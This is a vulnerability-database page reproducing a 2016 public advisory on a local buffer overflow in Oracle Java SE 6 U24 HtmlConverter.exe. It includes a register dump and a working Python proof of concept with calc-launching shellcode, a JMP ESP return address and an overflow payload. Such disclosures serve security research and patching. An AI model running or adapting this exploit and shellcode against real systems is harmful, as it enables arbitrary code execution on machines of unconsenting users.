Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle - HtmlConverter.exe Buffer Overflow

🗓️ 21 Jan 2016 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 24 Views

Oracle Java SE 6 U24 HtmlConverter.exe Buffer Overflo

Code
[+] Credits: hyp3rlinx


Vendor:
===============
www.oracle.com
 
 
Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50
 
 
The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.
 
 
 
Vulnerability Type:
============================
Buffer Overflow
 
 
CVE Reference:
==============
N/A
 
 
 
Vulnerability Details:
=====================
 
When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.
 
Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
 
 
 
registers ...
 
EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252                          <-------- "RRRR" \x52
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
 
 
 
Exploit code(s):
===============
 
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479
 
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
 
 
#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)
 
 
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)
 
 
Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016  : Public Disclosure
 
 
 
Exploitation Technique:
=======================
Local
 
 
 
Severity Level:
===============
Medium
 
 
 
Description:
=============================================================
 
Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jan 2016 00:00Current
6.8Medium risk
Vulners AI Score6.8
oraclejava sehtmlconverterbuffer overflowcvevulnerabilityexploitsecurityjdk0day
24